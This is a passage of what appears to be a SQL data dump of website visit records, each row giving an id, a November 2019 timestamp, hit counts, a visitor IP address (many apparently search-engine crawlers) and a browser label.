462880,1574363300,1,1,0,0,'141.8.132.12','other'),(462881,1574363345,2,2,0,0,'66.249.64.27','chrome'),(462882,1574364218,1,1,0,0,'5.45.207.65','chrome'),(462883,1574364299,1,1,0,0,'207.46.13.121','other'),(462884,1574365208,2,2,0,0,'178.63.11.212','other'),(462885,1574365484,1,1,0,0,'157.55.39.198','other'),(462886,1574365511,1,1,0,0,'141.8.183.15','chrome'),(462887,1574365530,1,1,0,0,'37.9.113.177','chrome'),(462888,1574366873,1,1,0,0,'157.55.39.198','other'),(462889,1574366882,1,1,0,0,'141.8.183.15','chrome'),(462890,1574368211,1,1,0,0,'141.8.183.15','other'),(462891,1574368257,1,1,0,0,'37.9.113.177','chrome'),(462892,1574369136,2,2,0,0,'157.55.39.198','other'),(462893,1574369459,1,1,0,0,'66.249.64.26','chrome'),(462894,1574369581,1,1,0,0,'66.249.64.28','chrome'),(462895,1574369638,1,1,0,0,'66.249.64.27','chrome'),(462896,1574369984,1,1,0,0,'8.29.198.27','other'),(462897,1574370045,1,1,0,0,'141.8.132.37','chrome'),(462898,1574370047,1,1,0,0,'87.250.224.90','chrome'),(462899,1574370111,1,1,0,0,'37.9.113.177','other'),(462900,1574370121,1,1,0,0,'141.8.142.115','chrome'),(462901,1574370167,1,1,0,0,'213.180.203.44','chrome'),(462902,1574370913,1,1,0,0,'52.12.33.144','chrome'),(462903,1574370917,4,4,0,0,'52.12.33.144','firefox'),(462904,1574371232,1,1,0,0,'8.29.198.25','other'),(462905,1574371636,1,1,0,0,'141.8.142.115','chrome'),(462906,1574371703,1,1,0,0,'141.8.142.161','chrome'),(462907,1574371708,1,1,0,0,'37.9.113.163','chrome'),(462908,1574372599,1,1,0,0,'66.249.64.28','chrome'),(462909,1574373086,1,1,0,0,'178.154.200.13','chrome'),(462910,1574373169,1,1,0,0,'178.154.200.33','other'),(462911,1574373970,1,1,0,0,'66.249.64.27','chrome'),(462912,1574374439,1,1,0,0,'95.108.213.55','chrome'),(462913,1574374468,1,1,0,0,'141.8.188.12','other'),(462914,1574374501,1,1,0,0,'141.8.183.33','chrome'),(462915,1574374512,1,1,0,0,'157.55.39.198','other'),(462916,1574375773,1,1,0,0,'87.250.224.90','chrome'),(462917,1574375777,1,1,0,0,'178.154.200.71','chrome'),(462918,1574375826,1,1,0,0,'178.154.200.13','chrome'),(462919,1574375835,1,1,0,0,'141.8.183.33','chrome'),(462920,1574375837,1,1,0,0,'5.45.207.49','chrome'),(462921,1574375861,1,1,0,0,'141.8.142.119','chrome'),(462922,1574376001,1,1,0,0,'157.55.39.80','other'),(462923,1574376029,1,1,0,0,'35.193.89.151','other'),(462924,1574377023,1,1,0,0,'213.180.203.44','chrome'),(462925,1574377333,1,1,0,0,'66.249.64.28','chrome'),(462926,1574377839,1,1,0,0,'207.46.13.94','other'),(462927,1574378359,1,1,0,0,'5.45.207.65','chrome'),(462928,1574378472,1,1,0,0,'66.249.64.26','chrome'),(462929,1574379789,1,1,0,0,'178.154.200.13','chrome'),(462930,1574379792,1,1,0,0,'37.9.113.177','chrome'),(462931,1574379832,1,1,0,0,'37.9.113.10','chrome'),(462932,1574380846,1,1,0,0,'8.29.198.27','other'),(462933,1574381376,1,1,0,0,'207.46.13.94','other'),(462934,1574381408,1,1,0,0,'66.249.64.27','chrome'),(462935,1574382123,1,1,0,0,'8.29.198.26','other'),(462936,1574382341,1,1,0,0,'213.180.203.37','chrome'),(462937,1574382697,1,1,0,0,'157.55.39.164','other'),(462938,1574383383,1,1,0,0,'213.180.203.44','chrome'),(462939,1574383392,1,1,0,0,'87.250.224.90','chrome'),(462940,1574383396,1,1,0,0,'141.8.142.161','chrome'),(462941,1574383475,1,1,0,0,'66.249.64.28','chrome'),(462942,1574383891,1,1,0,0,'207.46.13.94','other'),(462943,1574383951,1,1,0,0,'157.55.39.80','other'),(462944,1574385410,1,1,0,0,'66.249.64.27','chrome'),(462945,1574385695,1,1,0,0,'141.8.142.161','chrome'),(462946,1574385976,3,3,0,0,'52.34.239.250','firefox'),(462947,1574385981,1,1,0,0,'52.34.239.250','chrome'),(462949,1574386354,4,4,0,0,'66.249.64.26','chrome'),(462950,1574386671,3,3,0,0,'157.55.39.164','other'),(462951,1574386711,1,1,0,0,'157.55.39.80','other'),(462952,1574386952,1,1,0,0,'141.8.142.177','chrome'),(462953,1574386968,1,1,0,0,'141.8.142.115','chrome'),(462954,1574387407,1,1,0,0,'66.249.70.36','chrome'),(462955,1574387498,3,3,0,0,'66.249.64.28','chrome'),(462956,1574388110,2,2,0,0,'66.249.64.27','chrome'),(462957,1574388256,1,1,0,0,'37.9.113.33','chrome'),(462958,1574389427,1,1,0,0,'66.249.64.26','chrome'),(462959,1574389511,1,1,0,0,'37.9.113.10','chrome'),(462960,1574390033,1,1,0,0,'66.249.64.27','chrome'),(462961,1574390189,1,1,0,0,'157.55.39.80','other'),(462962,1574390470,1,1,0,0,'66.249.64.3','chrome'),(462963,1574390733,4,4,0,0,'66.249.64.26','chrome'),(462964,1574390738,1,1,0,0,'141.8.132.19','chrome'),(462965,1574390744,1,1,0,0,'141.8.142.2','chrome'),(462966,1574390760,1,1,0,0,'141.8.142.161','chrome'),(462967,1574390784,1,1,0,0,'95.108.181.104','chrome'),(462968,1574390787,1,1,0,0,'178.154.200.27','chrome'),(462969,1574390790,1,1,0,0,'95.108.213.55','other'),(462970,1574390996,1,1,0,0,'66.249.64.27','chrome'),(462971,1574391120,3,3,0,0,'66.249.64.28','chrome'),(462972,1574391214,1,1,0,0,'66.249.70.36','chrome'),(462973,1574391705,1,1,0,0,'8.29.198.27','other'),(462974,1574391768,3,3,0,0,'66.249.64.26','chrome'),(462975,1574391792,1,1,0,0,'37.9.113.10','chrome'),(462976,1574391816,1,1,0,0,'178.154.200.13','chrome'),(462977,1574391820,1,1,0,0,'141.8.142.50','chrome'),(462978,1574391841,1,1,0,0,'37.9.113.177','chrome'),(462979,1574391845,1,1,0,0,'141.8.142.177','chrome'),(462980,1574392296,2,2,0,0,'66.249.70.33','chrome'),(462981,1574392558,3,3,0,0,'66.249.64.28','chrome'),(462982,1574392735,2,2,0,0,'66.249.64.26','chrome'),(462983,1574392750,1,1,0,0,'66.249.76.122','chrome'),(462984,1574393001,1,1,0,0,'8.29.198.27','other'),(462985,1574393046,1,1,0,0,'141.8.142.161','chrome'),(462986,1574393432,1,1,0,0,'93.159.230.28','chrome'),(462987,1574393516,1,1,0,0,'66.249.64.27','chrome'),(462988,1574393607,2,2,0,0,'66.249.70.62','chrome'),(462989,1574393646,2,2,0,0,'157.55.39.164','other'),(462990,1574393688,2,2,0,0,'192.151.157.210','other'),(462991,1574394137,2,2,0,0,'207.46.13.94','other'),(462992,1574394255,4,4,0,0,'66.249.64.26','chrome'),(462993,1574395211,2,2,0,0,'66.249.70.33','chrome'),(462994,1574395340,3,3,0,0,'66.249.64.26','chrome'),(462995,1574395398,3,3,0,0,'66.249.64.27','chrome'),(462996,1574396371,3,3,0,0,'66.249.64.27','chrome'),(462997,1574396437,1,1,0,0,'66.249.70.62','chrome'),(462998,1574396652,1,1,0,0,'66.249.70.36','chrome'),(462999,1574396751,1,1,0,0,'141.8.142.50','other'),(463000,1574396861,2,2,0,0,'66.249.64.26','chrome'),(463001,1574396991,1,1,0,0,'66.249.64.28','chrome'),(463002,1574398014,1,1,0,0,'141.8.142.50','chrome'),(463003,1574398060,1,1,0,0,'87.250.224.90','chrome'),(463004,1574398669,6,6,0,0,'66.249.64.27','chrome'),(463005,1574399042,2,2,0,0,'66.249.70.33','chrome'),(463006,1574399251,1,1,0,0,'66.249.64.28','chrome'),(463007,1574399304,1,1,0,0,'141.8.142.161','chrome'),(463008,1574399312,2,2,0,0,'66.249.64.26','chrome'),(463009,1574399317,1,1,0,0,'141.8.132.2','chrome'),(463010,1574399332,1,1,0,0,'141.8.142.50','chrome'),(463011,1574399335,1,1,0,0,'141.8.142.177','chrome'),(463012,1574399338,1,1,0,0,'141.8.132.12','chrome'),(463013,1574399975,1,1,0,0,'66.249.70.33','chrome'),(463014,1574400754,1,1,0,0,'66.249.70.62','chrome'),(463015,1574400762,1,1,0,0,'141.8.142.115','chrome'),(463016,1574400768,4,4,0,0,'66.249.64.26','chrome'),(463017,1574401062,3,3,0,0,'66.249.64.27','chrome'),(463018,1574401071,1,1,0,0,'66.249.70.36','chrome'),(463019,1574401240,1,1,0,0,'66.249.64.28','chrome'),(463020,1574402254,1,1,0,0,'207.46.13.94','other'),(463021,1574402548,1,1,0,0,'8.29.198.25','other'),(463022,1574402831,3,3,0,0,'66.249.64.28','chrome'),(463023,1574403181,1,1,0,0,'66.249.70.62','chrome'),(463024,1574403217,3,3,0,0,'66.249.64.26','chrome'),(463025,1574403300,1,1,0,0,'141.8.183.33','other'),(463026,1574403336,1,1,0,0,'141.8.132.12','chrome'),(463027,1574403885,1,1,0,0,'8.29.198.25','other'),(463028,1574404263,3,3,0,0,'66.249.64.27','chrome'),(463029,1574404381,4,4,0,0,'66.249.64.28','chrome'),(463030,1574404520,2,2,0,0,'66.249.70.36','chrome'),(463031,1574404648,1,1,0,0,'141.8.142.115','other'),(463032,1574404649,3,3,0,0,'66.249.70.62','chrome'),(463033,1574404688,1,1,0,0,'213.180.203.37','chrome'),(463034,1574404712,1,1,0,0,'37.9.113.163','chrome'),(463035,1574405017,1,1,0,0,'66.249.70.33','chrome'),(463036,1574405182,2,2,0,0,'66.249.64.26','chrome'),(463037,1574405185,4,4,0,0,'66.249.64.27','chrome'),(463038,1574406024,1,1,0,0,'178.154.200.33','other'),(463039,1574406059,2,2,0,0,'66.249.70.62','chrome'),(463040,1574406061,1,1,0,0,'66.249.64.28','chrome'),(463041,1574406251,1,1,0,0,'37.9.113.177','other'),(463042,1574406556,2,2,0,0,'66.249.70.36','chrome'),(463043,1574406610,2,2,0,0,'66.249.64.27','chrome'),(463044,1574407019,3,3,0,0,'66.249.64.28','chrome'),(463045,1574407336,3,3,0,0,'66.249.64.26','chrome'),(463046,1574407470,1,1,0,0,'178.154.200.13','chrome'),(463047,1574407819,2,2,0,0,'95.91.15.173','other'),(463048,1574407944,3,3,0,0,'66.249.64.28','chrome'),(463049,1574407949,2,2,0,0,'66.249.64.27','chrome'),(463050,1574407966,1,1,0,0,'66.249.70.36','chrome'),(463051,1574408835,1,1,0,0,'141.8.132.19','chrome'),(463052,1574408963,2,2,0,0,'66.249.64.27','chrome'),(463053,1574409026,2,2,0,0,'66.249.64.28','chrome'),(463054,1574409054,2,2,0,0,'66.249.64.26','chrome'),(463055,1574409462,1,1,0,0,'66.249.70.62','chrome'),(463056,1574409640,2,2,0,0,'94.23.58.212','firefox'),(463057,1574409937,2,2,0,0,'66.249.64.28','chrome'),(463058,1574410006,1,1,0,0,'66.249.70.36','chrome'),(463059,1574410007,3,3,0,0,'66.249.64.27','chrome'),(463060,1574410017,1,1,0,0,'66.249.70.33','chrome'),(463061,1574410062,1,1,0,0,'213.108.45.138','firefox'),(463062,1574410193,1,1,0,0,'141.8.132.2','chrome'),(463063,1574410199,1,1,0,0,'66.249.64.26','chrome'),(463064,1574410234,1,1,0,0,'141.8.142.115','chrome'),(463065,1574410238,1,1,0,0,'141.8.188.25','chrome'),(463066,1574410307,1,1,0,0,'141.8.142.50','chrome'),(463067,1574410416,1,1,0,0,'66.249.70.62','chrome'),(463068,1574411897,1,1,0,0,'91.196.178.84','chrome'),(463069,1574412567,2,2,0,0,'66.249.64.27','chrome'),(463070,1574412848,1,1,0,0,'178.154.200.33','chrome'),(463071,1574413411,1,1,0,0,'8.29.198.27','other'),(463072,1574413426,1,1,0,0,'91.196.178.84','chrome'),(463073,1574413653,2,2,0,0,'66.249.70.33','chrome'),(463074,1574413665,4,4,0,0,'66.249.64.26','chrome'),(463075,1574414098,1,1,0,0,'141.8.142.115','chrome'),(463076,1574414130,1,1,0,0,'141.8.132.19','chrome'),(463077,1574414172,1,1,0,0,'141.8.142.161','other'),(463078,1574414541,1,1,0,0,'213.87.134.186','other'),(463079,1574414750,1,1,0,0,'8.29.198.25','other'),(463080,1574415055,1,1,0,0,'3.135.232.160','chrome'),(463081,1574415244,1,1,0,0,'66.249.64.26','chrome'),(463082,1574415283,1,1,0,0,'157.55.39.74','other'),(463083,1574416510,5,5,0,0,'66.249.64.26','chrome'),(463084,1574416652,4,4,0,0,'66.249.64.28','chrome'),(463085,1574416781,1,1,0,0,'141.8.132.12','chrome'),(463086,1574416806,1,1,0,0,'37.9.113.33','other'),(463087,1574417135,2,2,0,0,'66.249.70.62','chrome'),(463088,1574417222,1,1,0,0,'91.196.178.175','chrome'),(463089,1574417430,5,5,0,0,'66.249.64.26','chrome'),(463090,1574417475,1,1,0,0,'66.249.64.27','chrome'),(463091,1574417692,3,3,0,0,'66.249.64.28','chrome'),(463092,1574418272,1,1,0,0,'91.196.178.84','chrome'),(463093,1574418341,1,1,0,0,'157.55.39.74','other'),(463094,1574418390,3,3,0,0,'66.249.64.26','chrome'),(463095,1574418607,1,1,0,0,'34.220.156.89','chrome'),(463096,1574418611,4,4,0,0,'34.220.156.89','firefox'),(463097,1574418693,2,2,0,0,'66.249.64.27','chrome'),(463098,1574418797,2,2,0,0,'66.249.70.62','chrome'),(463099,1574418833,1,1,0,0,'31.13.127.7','other'),(463100,1574418834,1,1,0,0,'31.13.127.6','other'),(463101,1574418857,1,1,0,0,'31.13.115.21','other'),(463102,1574418859,1,1,0,0,'31.13.115.16','other'),(463103,1574418921,1,1,0,0,'31.13.127.15','other'),(463104,1574418922,1,1,0,0,'31.13.127.21','other'),(463107,1574418924,1,1,0,0,'173.252.95.16','other'),(463108,1574418940,1,1,0,0,'91.196.178.135','other'),(463109,1574419093,1,1,0,0,'66.249.64.28','chrome'),(463110,1574419496,1,1,0,0,'5.45.207.49','chrome'),(463111,1574419515,1,1,0,0,'141.8.142.2','chrome'),(463112,1574419535,1,1,0,0,'37.9.113.163','chrome'),(463113,1574419549,1,1,0,0,'5.45.207.65','other'),(463114,1574419553,5,5,0,0,'66.249.64.26','chrome'),(463115,1574419618,25,25,0,0,'45.132.138.8','chrome'),(463116,1574419762,4,4,0,0,'66.249.64.27','chrome'),(463117,1574419790,2,2,0,0,'207.46.13.252','other'),(463118,1574420471,4,4,0,0,'66.249.64.26','chrome'),(463119,1574420534,2,2,0,0,'34.220.13.175','firefox'),(463120,1574420539,1,1,0,0,'34.220.13.175','chrome'),(463121,1574420540,1,1,0,0,'34.220.13.175','chrome'),(463123,1574420748,1,1,0,0,'91.196.178.164','chrome'),(463124,1574420915,1,1,0,0,'66.249.64.27','chrome'),(463125,1574420939,1,1,0,0,'141.8.142.164','chrome'),(463126,1574420943,1,1,0,0,'5.45.207.49','chrome'),(463127,1574420992,1,1,0,0,'141.8.142.119','chrome'),(463128,1574421234,1,1,0,0,'207.46.13.252','other'),(463129,1574421400,1,1,0,0,'157.55.39.168','other'),(463130,1574421527,1,1,0,0,'66.249.64.28','chrome'),(463131,1574421628,2,2,0,0,'66.249.70.33','chrome'),(463132,1574421682,1,1,0,0,'66.249.70.62','chrome'),(463133,1574422128,2,2,0,0,'66.249.70.36','chrome'),(463134,1574422170,1,1,0,0,'109.74.154.72','chrome'),(463135,1574422260,3,3,0,0,'66.249.64.26','chrome'),(463136,1574422452,1,1,0,0,'46.211.140.71','chrome'),(463137,1574423138,1,1,0,0,'207.46.13.252','other'),(463138,1574423939,1,1,0,0,'141.8.132.12','chrome'),(463139,1574424181,1,1,0,0,'66.249.64.28','chrome'),(463140,1574424207,3,3,0,0,'66.249.64.27','chrome'),(463141,1574424278,1,1,0,0,'8.29.198.27','other'),(463142,1574424333,1,1,0,0,'91.196.178.79','firefox'),(463143,1574424614,2,2,0,0,'5.9.70.113','other'),(463144,1574424807,4,4,0,0,'66.249.64.26','chrome'),(463145,1574425026,1,1,0,0,'66.249.70.62','chrome'),(463146,1574425070,1,1,0,0,'91.196.177.46','chrome'),(463147,1574425320,1,1,0,0,'178.154.200.60','chrome'),(463148,1574425630,1,1,0,0,'8.29.198.26','other'),(463149,1574426376,1,1,0,0,'66.249.64.27','chrome'),(463150,1574426384,1,1,0,0,'66.249.64.26','chrome'),(463151,1574426684,1,1,0,0,'141.8.188.25','chrome'),(463152,1574427124,1,1,0,0,'66.249.70.62','chrome'),(463153,1574427554,2,2,0,0,'66.249.64.28','chrome'),(463154,1574427600,7,7,0,0,'66.249.64.26','chrome'),(463155,1574427866,1,1,0,0,'141.8.142.50','chrome'),(463156,1574427878,1,1,0,0,'141.8.132.19','chrome'),(463157,1574427916,1,1,0,0,'141.8.142.115','chrome'),(463158,1574427935,1,1,0,0,'66.249.70.33','chrome'),(463159,1574428286,4,4,0,0,'66.249.64.27','chrome'),(463160,1574428632,1,1,0,0,'66.249.64.28','chrome'),(463161,1574428653,1,1,0,0,'66.249.64.26','chrome'),(463162,1574429192,1,1,0,0,'91.196.178.189','chrome'),(463163,1574429269,1,1,0,0,'46.211.147.144','chrome'),(463164,1574429380,1,1,0,0,'141.8.142.177','chrome'),(463165,1574429822,1,1,0,0,'66.249.64.28','chrome'),(463166,1574429838,1,1,0,0,'66.249.70.33','chrome'),(463167,1574429857,3,3,0,0,'66.249.64.26','chrome'),(463168,1574430837,1,1,0,0,'213.180.203.44','chrome'),(463169,1574430969,1,1,0,0,'37.55.226.114','firefox'),(463170,1574431148,1,1,0,0,'207.46.13.76','other'),(463171,1574431157,7,7,0,0,'66.249.64.26','chrome'),(463172,1574431333,5,5,0,0,'66.249.64.28','chrome'),(463173,1574431446,4,4,0,0,'66.249.64.27','chrome'),(463174,1574431463,1,1,0,0,'66.249.70.36','chrome'),(463175,1574431760,1,1,0,0,'91.196.177.46','chrome'),(463176,1574431823,1,1,0,0,'66.249.70.62','chrome'),(463177,1574431990,1,1,0,0,'157.55.39.168','other'),(463178,1574432202,1,1,0,0,'66.249.64.26','chrome'),(463179,1574432228,1,1,0,0,'141.8.183.15','other'),(463180,1574432249,1,1,0,0,'141.8.132.12','chrome'),(463181,1574432892,1,1,0,0,'66.249.64.27','chrome'),(463182,1574433228,1,1,0,0,'31.13.127.17','other'),(463183,1574433229,2,2,0,0,'31.13.127.21','other'),(463185,1574433346,1,1,0,0,'66.249.64.28','chrome'),(463186,1574433351,1,1,0,0,'66.249.70.33','chrome'),(463187,1574433383,2,2,0,0,'66.249.64.26','chrome'),(463188,1574433587,1,1,0,0,'95.108.181.104','chrome'),(463189,1574433978,3,3,0,0,'66.249.64.27','chrome'),(463190,1574434137,2,2,0,0,'66.249.70.44','chrome'),(463191,1574434690,1,1,0,0,'91.196.179.33','chrome'),(463192,1574434798,6,6,0,0,'66.249.64.26','chrome'),(463193,1574435050,1,1,0,0,'207.46.13.66','other'),(463194,1574435106,1,1,0,0,'66.249.64.27','chrome'),(463195,1574435142,1,1,0,0,'8.29.198.26','other'),(463196,1574435368,1,1,0,0,'141.8.188.25','other'),(463197,1574435639,1,1,0,0,'31.148.29.21','chrome'),(463198,1574436197,1,1,0,0,'141.8.188.12','other'),(463199,1574436297,1,1,0,0,'141.8.142.177','chrome'),(463200,1574436529,1,1,0,0,'8.29.198.26','other'),(463201,1574436560,1,1,0,0,'207.46.13.76','other'),(463202,1574436668,1,1,0,0,'66.249.70.36','chrome'),(463203,1574436695,2,2,0,0,'66.249.64.28','chrome'),(463204,1574436737,1,1,0,0,'207.46.13.252','other'),(463205,1574436850,2,2,0,0,'66.249.64.27','chrome'),(463206,1574436917,1,1,0,0,'66.249.70.50','chrome'),(463207,1574436932,1,1,0,0,'66.249.64.26','chrome'),(463208,1574437273,1,1,0,0,'157.55.39.74','other'),(463209,1574437429,1,1,0,0,'46.211.158.175','chrome'),(463210,1574437452,1,1,0,0,'37.9.113.177','chrome'),(463211,1574437565,2,2,0,0,'66.249.70.33','chrome'),(463212,1574437630,1,1,0,0,'213.180.203.37','other'),(463213,1574437863,1,1,0,0,'66.249.64.28','chrome'),(463214,1574438351,1,1,0,0,'173.252.87.37','other'),(463215,1574438353,1,1,0,0,'173.252.87.5','other'),(463216,1574438381,1,1,0,0,'209.17.96.58','other'),(463217,1574438471,1,1,0,0,'157.55.39.74','other'),(463218,1574439108,2,2,0,0,'66.249.64.27','chrome'),(463219,1574439242,2,2,0,0,'66.249.70.36','chrome'),(463220,1574439300,1,1,0,0,'66.249.64.28','chrome'),(463221,1574439340,2,2,0,0,'66.249.64.26','chrome'),(463222,1574439757,1,1,0,0,'91.196.178.99','chrome'),(463223,1574439825,1,1,0,0,'178.216.188.71','chrome'),(463224,1574440111,1,1,0,0,'141.8.142.119','chrome'),(463225,1574440589,1,1,0,0,'188.163.75.58','chrome'),(463226,1574440648,1,1,0,0,'37.153.123.75','chrome'),(463227,1574440656,1,1,0,0,'178.205.153.229','chrome'),(463228,1574441004,2,2,0,0,'66.249.64.26','chrome'),(463229,1574441014,1,1,0,0,'66.249.64.27','chrome'),(463230,1574441441,1,1,0,0,'37.9.113.177','other'),(463231,1574442069,1,1,0,0,'107.158.32.58','chrome'),(463232,1574442738,1,1,0,0,'178.154.200.71','chrome'),(463233,1574442804,2,2,0,0,'207.46.13.76','other'),(463234,1574443131,1,1,0,0,'66.249.64.28','chrome'),(463235,1574443488,1,1,0,0,'66.220.149.18','other'),(463236,1574443590,1,1,0,0,'66.249.64.27','chrome'),(463237,1574444372,1,1,0,0,'207.46.13.138','other'),(463238,1574444432,1,1,0,0,'46.133.125.221','chrome'),(463239,1574444888,1,1,0,0,'66.249.64.27','chrome'),(463240,1574445083,1,1,0,0,'207.46.13.76','other'),(463241,1574445405,1,1,0,0,'5.45.207.49','chrome'),(463242,1574445412,1,1,0,0,'141.8.132.37','chrome'),(463243,1574445416,1,1,0,0,'213.180.203.44','chrome'),(463244,1574445419,1,1,0,0,'213.180.203.37','chrome'),(463245,1574445478,1,1,0,0,'141.8.188.12','chrome'),(463246,1574446011,1,1,0,0,'8.29.198.27','other'),(463247,1574446081,1,1,0,0,'213.179.252.88','chrome'),(463248,1574446222,1,1,0,0,'66.249.64.28','chrome'),(463249,1574446430,1,1,0,0,'66.249.70.36','chrome'),(463250,1574447389,1,1,0,0,'66.249.64.26','chrome'),(463251,1574447401,1,1,0,0,'8.29.198.26','other'),(463252,1574448085,1,1,0,0,'141.8.142.2','other'),(463253,1574448123,1,1,0,0,'141.8.183.15','chrome'),(463254,1574449072,1,1,0,0,'185.53.79.133','chrome'),(463255,1574449339,1,1,0,0,'66.249.64.28','chrome'),(463256,1574449431,1,1,0,0,'141.8.132.37','other'),(463257,1574449603,1,1,0,0,'185.244.214.228','msie'),(463258,1574450123,1,1,0,0,'35.243.133.239','firefox'),(463259,1574450247,1,1,0,0,'176.113.170.104','chrome'),(463260,1574450663,1,1,0,0,'37.9.113.163','chrome'),(463261,1574451822,1,1,0,0,'173.252.87.49','other'),(463262,1574451976,2,2,0,0,'66.249.64.27','chrome'),(463263,1574452019,1,1,0,0,'5.45.207.65','chrome'),(463264,1574452465,1,0,1,0,'66.249.70.62',''),(463265,1574452822,2,2,0,0,'66.249.64.28','chrome'),(463266,1574453065,2,2,0,0,'66.249.64.26','chrome'),(463267,1574453376,1,1,0,0,'37.9.113.163','chrome'),(463268,1574453429,1,1,0,0,'5.45.207.49','other'),(463269,1574453520,1,1,0,0,'157.55.39.49','other'),(463270,1574453605,1,1,0,0,'141.8.183.33','other'),(463271,1574453670,2,2,0,0,'66.249.64.27','chrome'),(463272,1574453841,1,1,0,0,'207.46.13.187','other'),(463273,1574454100,2,2,0,0,'78.46.85.236','other'),(463274,1574454150,1,1,0,0,'157.55.39.105','other'),(463275,1574454684,2,2,0,0,'141.8.132.2','chrome'),(463276,1574454739,1,1,0,0,'95.108.181.104','chrome'),(463277,1574454751,1,1,0,0,'141.8.142.119','other'),(463278,1574455525,2,2,0,0,'66.249.64.26','chrome'),(463279,1574455527,3,3,0,0,'66.249.70.62','chrome'),(463280,1574455626,3,3,0,0,'66.249.64.28','chrome'),(463281,1574455906,2,2,0,0,'66.249.64.27','chrome'),(463282,1574455991,1,1,0,0,'141.8.142.177','chrome'),(463283,1574456010,1,1,0,0,'37.9.113.163','chrome'),(463284,1574456023,1,1,0,0,'5.45.207.65','chrome'),(463285,1574456088,1,1,0,0,'37.9.113.33','other'),(463286,1574456103,1,1,0,0,'141.8.142.2','chrome'),(463287,1574456408,1,1,0,0,'69.171.251.17','other'),(463288,1574456410,1,1,0,0,'37.53.110.17','firefox'),(463289,1574456419,1,1,0,0,'66.249.70.33','chrome'),(463290,1574456448,1,1,0,0,'93.74.117.128','chrome'),(463291,1574456800,1,1,0,0,'66.249.64.26','chrome'),(463292,1574456868,1,1,0,0,'8.29.198.25','other'),(463293,1574457111,1,1,0,0,'157.55.39.105','other'),(463294,1574457565,2,2,0,0,'66.249.64.27','chrome'),(463295,1574457566,1,1,0,0,'66.249.64.28','chrome'),(463296,1574457803,1,1,0,0,'66.249.70.62','chrome'),(463297,1574458259,1,1,0,0,'8.29.198.25','other'),(463298,1574458616,1,1,0,0,'207.46.13.187','other'),(463299,1574459151,1,1,0,0,'173.252.87.32','other'),(463300,1574459513,1,1,0,0,'66.249.64.26','chrome'),(463301,1574459896,1,1,0,0,'178.154.200.71','other'),(463302,1574460018,1,1,0,0,'173.252.95.15','other'),(463303,1574460298,1,1,0,0,'91.196.178.70','chrome'),(463304,1574460863,1,1,0,0,'66.249.68.4','chrome'),(463305,1574461060,1,1,0,0,'157.55.39.56','other'),(463306,1574461359,1,1,0,0,'66.249.64.28','chrome'),(463307,1574461365,1,1,0,0,'141.8.142.50','other'),(463308,1574461928,23,23,0,0,'45.132.138.8','chrome'),(463309,1574462395,1,1,0,0,'66.249.75.64','chrome'),(463310,1574462451,2,2,0,0,'66.249.75.68','chrome'),(463311,1574463723,3,3,0,0,'66.249.75.64','chrome'),(463312,1574463904,2,2,0,0,'157.55.39.49','other'),(463313,1574465840,4,4,0,0,'66.249.75.64','chrome'),(463314,1574465889,1,1,0,0,'66.249.69.97','chrome'),(463315,1574465975,2,2,0,0,'66.249.75.66','chrome'),(463316,1574466957,1,1,0,0,'213.180.203.44','other'),(463317,1574467130,2,2,0,0,'66.249.75.68','chrome'),(463318,1574467140,3,3,0,0,'66.249.75.66','chrome'),(463319,1574467233,10,10,0,0,'66.249.75.64','chrome'),(463320,1574467271,1,1,0,0,'46.188.98.10','chrome'),(463321,1574467293,1,1,0,0,'66.249.69.100','chrome'),(463322,1574467718,1,1,0,0,'8.29.198.27','other'),(463323,1574467833,1,1,0,0,'66.249.69.126','chrome'),(463324,1574468045,1,1,0,0,'66.249.75.66','chrome'),(463325,1574468722,3,3,0,0,'52.24.208.65','chrome'),(463326,1574468726,2,2,0,0,'52.24.208.65','firefox'),(463327,1574468739,3,3,0,0,'54.212.191.184','firefox'),(463328,1574468743,2,2,0,0,'54.212.191.184','chrome'),(463329,1574469106,1,1,0,0,'8.29.198.27','other'),(463330,1574469774,1,1,0,0,'157.55.39.56','other'),(463331,1574469883,1,1,0,0,'157.55.39.141','other'),(463332,1574470075,8,8,0,0,'66.249.75.64','chrome'),(463333,1574470087,7,7,0,0,'66.249.75.66','chrome'),(463334,1574470268,1,1,0,0,'66.249.75.68','chrome'),(463335,1574470998,2,2,0,0,'66.249.75.64','chrome'),(463336,1574471003,2,2,0,0,'66.249.69.97','chrome'),(463337,1574471380,4,4,0,0,'66.249.75.66','chrome'),(463338,1574471665,1,1,0,0,'66.249.75.68','chrome'),(463339,1574472219,1,1,0,0,'17.58.101.25','other'),(463340,1574472608,2,2,0,0,'157.55.39.141','other'),(463341,1574472914,3,3,0,0,'66.249.69.62','chrome'),(463342,1574473101,1,1,0,0,'66.249.69.37','chrome'),(463343,1574473765,2,2,0,0,'66.249.69.126','chrome'),(463344,1574473776,1,1,0,0,'66.249.75.98','chrome'),(463345,1574474370,3,3,0,0,'66.249.69.34','chrome'),(463346,1574474412,2,2,0,0,'66.249.69.37','chrome'),(463347,1574474491,1,1,0,0,'66.249.75.126','chrome'),(463348,1574474510,5,5,0,0,'66.249.69.62','chrome'),(463349,1574475965,1,1,0,0,'141.8.188.12','other'),(463350,1574476042,1,1,0,0,'66.249.69.37','chrome'),(463351,1574477044,1,1,0,0,'157.55.39.105','other'),(463352,1574477249,1,1,0,0,'213.180.203.37','other'),(463353,1574477311,2,2,0,0,'66.249.69.37','chrome'),(463354,1574477334,6,6,0,0,'66.249.69.62','chrome'),(463355,1574477881,2,2,0,0,'66.249.75.97','chrome'),(463356,1574477905,3,3,0,0,'66.249.75.126','chrome'),(463357,1574477917,4,4,0,0,'66.249.69.34','chrome'),(463358,1574478276,12,12,0,0,'66.249.69.62','chrome'),(463359,1574478518,1,1,0,0,'157.55.39.141','other'),(463360,1574478586,1,1,0,0,'8.29.198.26','other'),(463361,1574478720,3,3,0,0,'66.249.69.37','chrome'),(463362,1574479007,1,1,0,0,'157.55.39.182','other'),(463363,1574479032,4,4,0,0,'66.249.69.34','chrome'),(463364,1574479102,7,7,0,0,'66.249.75.126','chrome'),(463365,1574479169,1,1,0,0,'66.249.75.97','chrome'),(463366,1574479195,10,10,0,0,'66.249.69.62','chrome'),(463367,1574479743,3,3,0,0,'66.249.69.37','chrome'),(463368,1574479953,1,1,0,0,'8.29.198.25','other'),(463369,1574480048,7,7,0,0,'66.249.75.126','chrome'),(463370,1574480089,2,2,0,0,'66.249.69.34','chrome'),(463371,1574480119,1,1,0,0,'46.211.135.72','chrome'),(463372,1574480183,10,10,0,0,'66.249.69.62','chrome'),(463373,1574480645,3,3,0,0,'66.249.75.100','chrome'),(463374,1574480705,4,4,0,0,'66.249.69.37','chrome'),(463375,1574480933,3,3,0,0,'66.249.75.97','chrome'),(463376,1574481168,5,5,0,0,'66.249.75.126','chrome'),(